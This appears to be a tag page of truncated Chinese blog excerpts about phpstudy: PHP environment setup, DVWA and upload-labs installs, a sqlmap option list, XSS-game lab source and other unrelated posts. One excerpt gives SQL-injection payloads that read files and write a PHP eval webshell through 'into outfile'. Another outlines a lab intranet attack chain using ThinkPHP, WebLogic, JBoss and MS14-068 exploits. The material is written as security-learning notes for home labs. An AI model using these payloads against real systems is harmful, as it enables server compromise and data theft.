phpstudy

phpstudy+phpstorm+navicat环境配置 这篇文章对我帮助很大，附上链接 https://blog.csdn.net/u012861467/article/details/54692236 本文章着重记录学习过程如果对你有帮助或文章有需要更正的地方还可多多留言交流 软件下载 （1）phpstorm下载安装： https://www.php.cn/tool/phpstorm/428628.html （2）Navicat下载安装： https://blog.csdn.net/qq_43226819/article/details/105417243 （3）Phpstudy下载安装： https://www.xp.cn/ 安装步骤不详细说，参见百度 phpstudy部分配置 这部分主要是网站和数据库等的创建，打开phpstudy网站界面，有个默认的localhost 看着它里面的配置可以自己新建一个网站操作试一下 创建好网站后查看设置/配置文件里的hosts，会发现服务器和域名绑定（如果没有，手动修改然后保存会自动弹出C:\windows\system32\drivers\etc目录，在这里面去找到hosts文件属性查看是否为只读，取消后便能保存修改，新版目前都支持创建网站时自动同步hosts的） 然后创建数据库，这里内容可自行设置并记住 navicat部分

首先自从上次的任务之后，我发现我的基础知识几乎是没有的，很多东西理解不了，也做不出来。于是我决定补补基础知识。 首先关于虚拟机 1、通过查阅我认为，虚拟机就是通过程序模拟出来的计算机，没有物理结构，通常被用来保护物理计算机的。 （此处发生了一点小意外，我的JAVA被我搞坏了，我在清理桌面的时候不知道是把什么卸载了于是我的JAVA也坏了） Dirsearch学习笔记 首先我遇到了的第一个问题就是，打不开！闪退！ 首先猜测Python的版本问题，百度之后发现是我智商问题，要在cmd中启动。 下一个神奇的问题，cmd找不到这个东西，我认为是我的命令语句有问题 显示找不到文件 这个地方遇到了一些小问题，没有成功。 发现了，命令不对 这就可以了 下面是搭建dvwa靶场 首先下载dvwa,复制到PHPstudy的www文件夹下，然后找到config用记事本打开，此处我犯了一个错误。按理说应该先建立一个数据库，在进行一系列的更改操作。但是我并没有建立数据库，而是直接选择了更改。于是乎我的一个下午报销了。 此处更改数据库用户名及密码 后知后觉的建立数据库 还有这个迷惑了我许久的这个网址到底是怎么来的这个问题 成功 这里在这部一句，我一开始以为这就是他的界面，后来我才知道，需要登录与数据库匹配。。。。又是疑惑了好久 这个才是正常的 brupsuit的使用没有做特别详细的记录，在做题的时候有部分截图。

所遇情形 问题原因 网站过期 解决方法 1、删除过期的网站： 2、之后重新建网站即可： 之后重启服务即可： 来源： oschina 链接： https://my.oschina.net/u/4297414/blog/4335254

sqlmap简介 sqlmap是一款基于python编写的渗透测试工具，在sql检测和利用方面功能强大，支持多种数据库。 sqlmap常用命令 -h 显示基本帮助信息 -hh 显示高级帮助信息 --version 显示版本号 -v 详细等级（0-6 默认 1） 0：只显示python错误以及重要信息 1：显示信息以及警告 2：显示debug消息 3：显示注入payload 4：显示http请求 5：显示http响应头· 6：显示http响应内容 Target： -u 指定目标url -d 直接连接数据库 -l 从burp代理日志的解析目标 -r 从文件中加载http请求 -g 从google dork的结果作为目标url -c 从INI配置文件中加载选项 Request -A 指定user-agent头 -H 额外的header -method= 指定HTTP方法（GET/POST） --data= 通过POST提交数据 --param-del= 指定参数分隔符 --cookie= 指定cookie的值 --cookie-del= 指定cookie分隔符 --drop-set-cookie 扔掉response中的set-cookie头 --random-agent 使用随机的user-agent头 --host= 设置host头 --referer= 指定referer头 -

配置 下载地址: https://files.cnblogs.com/files/Lmg66/xssgame-master.zip 使用:下载解压，放到www目录下(phpstudy)，http服务下都行，我使用的是phpstudy 第一关 查看源码: <!DOCTYPE html> <head> <meta charset="utf-8"> <script> window.alert = function() { confirm("哎哟 不错哦！"); window.location.href="level2.php?keyword=跨站师"; } </script> <title>第1关</title> </head> <body> <h1 align=center>第1关 先热个身吧</h1> <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户:".$str."</h2>"; ?> <center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/8deed969-b339-4c84-8654-b1a1e40e06de.png" width="50%"></center> <?php

前言 运行平台: windows 10家庭版 php代码地址: github: https://github.com/wakasann/gksvideo_in_pc gitee: https://gitee.com/mrshenyuan/gksvideo_in_pc b站视频: av88853974 项目开始原因: 因为烦使用快手App 自带的下载按钮下载到的视频，在视频的末尾会有快手官方的一小段视频(台词是:快手看见每一种生活) 必须: 电脑: 已安装 Fiddler 软件 WAMP(WIndows下安装Apache,PHP,Mysql软件,我为了省事，使用的是最新版的 phpstudy) git for windows 安卓手机连接的WLAN 的代理已配置好 Fiddler的连接信息 如未配置好Fiddler和安卓手机的代理，可参考我之前的博文 使用fiddler 软件监听手机app的http请求 ，这里跳过 介绍phpstudy的安装、Fiddler 配置、安卓手机设置WLAN代理。 构思: Fiddler和 php 项目之间的配合 通过Fiddler 查看一些http请求返回结果，在快手 App 首页的几个标签的内容或者个人主页，会请求一些 api，会返回短视频列表显示需要的封面图和作者，视频地址(在App 内看是无水印的视频) 快手App 刷新列表

SQL注入中的文件读写 以mysql为例 mysql读写文件有一个非常重要的前置条件： show global variables like '%secure%' 查看mysql全局变量的配置，当输入以上命令后，结果 secure_file_priv = 空的时候 ，任意读写 secure_file_priv = 某个路径的时候，只能在规定的那个路径下读写 secure_file_priv = NULL 不能读写 要修改配置在数据库配置文件中修改 读： load_file('filename') filename就是指定读取的文件 以sqlilab的第1关为例： -1' union select ,1,(Select load_file('c:/phpstudy/www/1.txt')),3%23 读取1.txt里面的内容 写： select 'content' into outfile 'filename' : content指的是我们要写的内容，filename是要保存的文件名 以sqlilab的第1关为例： -1' union select 1,2," ?php@eval($_GET['test']);? " into outfile 'c:/phpstudy/www/test123.php' %23 把一句话木马写到/www/test123.php 读写的条件： 1

对于php开发小白来说搭建一个php运行环境就是一道坎！ 因为要做php开发，搭建一个能够运行php网站的服务器环境是第一步，传统的php环境软件非常复杂，好在很多公司开发了一键搭建php安装环境，一键进行php环境配置，大大节省了搭建php mysql环境的时间！对老手来说安装配置php环境也不再是一件繁琐的事。 接下来大脸猫来给大家分享七种PHP开发环境搭建工具，当然也不仅仅有这七种仅仅只是这几种比较常见； 一、phpStudy phpStudy是一个新手入门最常用的开发环境。（还有一个梗就如同phpStudy的名字的中文意思一样PHP学习） phpStudy是一个PHP调试环境的程序集成包； 该程序包集成最新的Apache/Nginx+PHP+MySQL+phpMyAdmin+ZendOptimizer+OpenSSL，一次性安装，无需配置即可使用，是非常方便、好用的PHP调试环境； 该程序不仅包括PHP调试环境，还包括了开发工具、开发手册等。 二、WampServer WampServer也同样的也是和phpStudy一样操作简单对小白比较友好。 WampServer是一款由法国人开发的Apache Web服务器、PHP解释器以及MySQL数据库的整合软件包。免去了开发人员将时间花费在繁琐的配置环境过程，从而腾出更多精力去做开发。 WampServer就是Windows

本文仅为了学习交流，自己搭建靶机环境进行测试，严禁非法使用！！！ (随笔仅为平时的学习记录，若有错误请大佬指出) 一: 内网靶机分布 内网入口(攻击者和该win10在同一网段，攻击者无法访问win10虚拟机中的主机) win10 phpstudy thinkphpv5.0.24 域环境（均可以出网） win7 phpstudy uploads-lab win2003 jboss4.x漏洞 win2008 域控 双网卡(其中一个网卡链接着下面的主机) 其他主机(以下主机在同一网段，不能出网，与域环境处于不同网段，只有域控可以访问以下主机) win7 Tomcat win2008 Mssql win2003 win2012 weblogic 攻击思路: 拿下存下ThinkPhp漏洞的主机-开启socks代理进入内网-通过uploads-lab上传webshell拿下win7-通过weblogic漏洞拿下win2012dc-通过jboss4.x漏洞拿下win2003-通过MS14-068漏洞拿下域控-添加第二个网卡的路由-通过Tomcat漏洞拿下win7-解密win7的数据库密码拿下win2008权限-获取win2008的远程连接凭证拿下win2003-拿下全部主机 二:(Cobalt Strike3.14简称CS，Msfconsole简称MSF) 访问win10的web服务

之前介绍了Windows10_64位搭建WampServer的教程，这一次再来水一篇phpstudy的搭建教程。哈哈哈。 顺便安装一下 upload-labs ，搭着玩玩~ 操作系统：windows10_64位 软件：phpstudy v8. 1 （一）下载PHPstudy的安装包~ 下载链接： http://www.phpstudy.net/ （ https://www.xp.cn ） 笔者这里下载的是目前最新版PHPStudy V8.1 下载完成之后，就开始安装啦~ （二）安装 PHPstudy 注意 ：安装说明（特别注意） 1. 安装路径不能包含“中文”或者“空格”，否则会报错（例如错误提示：Can't change dir to 'G:\\x65b0\x5efa\x6587\） 2. 保证安装路径是纯净的，安装路径下不能有已安装的V8版本，若重新安装，请选择其它路径 选好路径之后，等待安装完成~ 打开界面 基础配置，ok~~~ 测试本地访问： 一键式傻瓜操作，真香！ （三）配置upload-labs 下载链接： https://github.com/c0ny1/upload-labs 下载后解压~ 放在我们之前安装好的phpstudy的WWW目录里~ 然后根据目录访问~ 完成~ 接下来就可以愉快的练习啦~~ 来源： oschina 链接： https://my